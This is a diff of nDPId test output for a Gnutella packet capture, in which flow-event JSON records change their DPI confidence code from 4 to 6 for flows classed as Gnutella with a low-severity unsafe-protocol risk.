00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287497,"flow_last_seen":287497,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.231.59.187","src_port":28681,"dst_port":62234,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287497,"flow_last_seen":287497,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.231.59.187","src_port":28681,"dst_port":62234,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287429,"flow_last_seen":287429,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.168.15.71","src_port":28681,"dst_port":53707,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -3335,7 +3335,7 @@ 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":251765,"flow_last_seen":287317,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.35.66.21","src_port":28681,"dst_port":22234,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287442,"flow_last_seen":287442,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.64.156.63","src_port":28681,"dst_port":60092,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287442,"flow_last_seen":287442,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.64.156.63","src_port":28681,"dst_port":60092,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":89966,"flow_last_seen":287418,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4798,"flow_avg_l4_payload_len":299,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":28681,"dst_port":26253,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":89966,"flow_last_seen":287418,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4798,"flow_avg_l4_payload_len":299,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":28681,"dst_port":26253,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287511,"flow_last_seen":287511,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"59.104.173.5","src_port":28681,"dst_port":49803,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287511,"flow_last_seen":287511,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"59.104.173.5","src_port":28681,"dst_port":49803,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287526,"flow_last_seen":287526,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.127.1.235","src_port":28681,"dst_port":37814,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -3370,7 +3370,7 @@ 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":251766,"flow_last_seen":287317,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"74.127.26.138","src_port":28681,"dst_port":3083,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287310,"flow_last_seen":287310,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"8.44.149.207","src_port":28681,"dst_port":30551,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287310,"flow_last_seen":287310,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"8.44.149.207","src_port":28681,"dst_port":30551,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":90039,"flow_last_seen":287497,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.181.251.218","src_port":28681,"dst_port":36368,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":90039,"flow_last_seen":287497,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.181.251.218","src_port":28681,"dst_port":36368,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287652,"flow_last_seen":287652,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.192.83.59","src_port":28681,"dst_port":33513,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287652,"flow_last_seen":287652,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.192.83.59","src_port":28681,"dst_port":33513,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287499,"flow_last_seen":287499,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.233.199.103","src_port":28681,"dst_port":2625,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -3399,7 +3399,7 @@ 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287625,"flow_last_seen":287625,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"50.58.238.149","src_port":28681,"dst_port":6514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":251799,"flow_last_seen":287319,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":28681,"dst_port":47184,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":251799,"flow_last_seen":287319,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":28681,"dst_port":47184,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":95893,"flow_last_seen":287340,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1914,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":28681,"dst_port":21995,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":95893,"flow_last_seen":287340,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1914,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":28681,"dst_port":21995,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287588,"flow_last_seen":287588,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.36.106.134","src_port":28681,"dst_port":3927,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287588,"flow_last_seen":287588,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.36.106.134","src_port":28681,"dst_port":3927,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287526,"flow_last_seen":287526,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"50.58.238.149","src_port":28681,"dst_port":6527,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -3410,7 +3410,7 @@ 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287682,"flow_last_seen":287682,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.249.190.8","src_port":28681,"dst_port":25198,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287699,"flow_last_seen":287699,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"50.58.238.163","src_port":28681,"dst_port":6564,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287699,"flow_last_seen":287699,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"50.58.238.163","src_port":28681,"dst_port":6564,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":124090,"flow_last_seen":287890,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.208.26.154","src_port":28681,"dst_port":4994,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":124090,"flow_last_seen":287890,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.208.26.154","src_port":28681,"dst_port":4994,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":243618,"flow_last_seen":287524,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"121.7.145.36","src_port":28681,"dst_port":33905,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":243618,"flow_last_seen":287524,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"121.7.145.36","src_port":28681,"dst_port":33905,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287859,"flow_last_seen":287859,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":28681,"dst_port":52420,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -3419,7 +3419,7 @@ 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":289962,"flow_last_seen":289962,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"50.58.238.163","src_port":28681,"dst_port":6599,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287497,"flow_last_seen":287497,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.179.18.242","src_port":28681,"dst_port":47329,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287497,"flow_last_seen":287497,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.179.18.242","src_port":28681,"dst_port":47329,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00798{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":89829,"flow_last_seen":287443,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3598,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":28681,"dst_port":35481,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":89829,"flow_last_seen":287443,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3598,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":28681,"dst_port":35481,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287321,"flow_last_seen":287321,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"42.72.149.140","src_port":28681,"dst_port":37848,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287321,"flow_last_seen":287321,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"42.72.149.140","src_port":28681,"dst_port":37848,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":287510,"flow_last_seen":287583,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"31.20.248.147","src_port":28681,"dst_port":30706,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -3440,7 +3440,7 @@ 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287497,"flow_last_seen":287497,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"68.174.18.115","src_port":28681,"dst_port":50679,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 